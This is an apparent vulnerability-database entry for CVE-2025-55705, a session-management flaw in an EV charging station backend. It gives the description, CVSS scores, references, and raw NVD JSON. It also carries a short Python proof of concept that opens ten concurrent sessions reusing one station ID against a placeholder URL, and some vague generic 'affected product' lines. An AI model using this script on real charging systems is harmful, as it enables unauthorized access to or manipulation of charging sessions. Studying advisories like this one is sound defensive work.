CVE-2025-55705

Description

This vulnerability occurs when the system permits multiple simultaneous connections to the backend using the same charging station ID. This can result in unauthorized access, data inconsistency, or potential manipulation of charging sessions. The lack of proper session management and expiration control allows attackers to exploit this weakness by reusing valid charging station IDs to establish multiple sessions concurrently.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:evmapa:evmapa:*:*:*:*:*:*:*:* - VULNERABLE

充电站管理系统 < 修复版本

支持OCPP协议的充电设备（所有版本）

未实施会话唯一性检查的后端系统

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import concurrent.futures

# CVE-2025-55705 PoC - Concurrent Session Exploitation
# Target: EV Charging Station with weak session management

TARGET_URL = "https://<target>/api/v2/charging-station/connect"
STATION_ID = "VALID_STATION_ID_HERE"  # Obtain valid station ID

def establish_session(session_num):
    """Establish concurrent session using same station ID"""
    headers = {
        "Content-Type": "application/json",
        "X-Station-ID": STATION_ID
    }
    payload = {
        "station_id": STATION_ID,
        "timestamp": "2026-01-22T00:00:00Z",
        "session_type": "charging"
    }
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)
        return {
            "session": session_num,
            "status": response.status_code,
            "response": response.json() if response.ok else None
        }
    except Exception as e:
        return {"session": session_num, "error": str(e)}

def exploit():
    """Launch concurrent sessions to demonstrate vulnerability"""
    results = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(establish_session, i) for i in range(10)]
        for future in concurrent.futures.as_completed(futures):
            results.append(future.result())
    
    successful = sum(1 for r in results if r.get('status') == 200)
    print(f"Sessions established: {successful}/10")
    return results

if __name__ == "__main__":
    print("CVE-2025-55705 - Concurrent Session Exploitation PoC")
    print("Target: EV Charging Station Session Management Vulnerability")
    results = exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55705
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55705
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55705/
[4] VulDB https://vuldb.com/cve/CVE-2025-55705
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json
[6] https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55705", "sourceIdentifier": "[email protected]", "published": "2026-01-22T23:15:50.137", "lastModified": "2026-02-12T18:02:38.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "This vulnerability occurs when the system permits multiple simultaneous \nconnections to the backend using the same charging station ID. This can \nresult in unauthorized access, data inconsistency, or potential \nmanipulation of charging sessions. The lack of proper session management\n and expiration control allows attackers to exploit this weakness by \nreusing valid charging station IDs to establish multiple sessions \nconcurrently."}, {"lang": "es", "value": "Esta vulnerabilidad ocurre cuando el sistema permite múltiples conexiones simultáneas al backend utilizando el mismo ID de estación de carga. Esto puede resultar en acceso no autorizado, inconsistencia de datos o manipulación potencial de las sesiones de carga. La falta de una gestión de sesión y control de expiración adecuados permite a los atacantes explotar esta debilidad reutilizando IDs válidos de estaciones de carga para establecer múltiples sesiones concurrentemente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:evmapa:evmapa:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C85ACDB-38D2-4466-9206-529F45F4720E"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}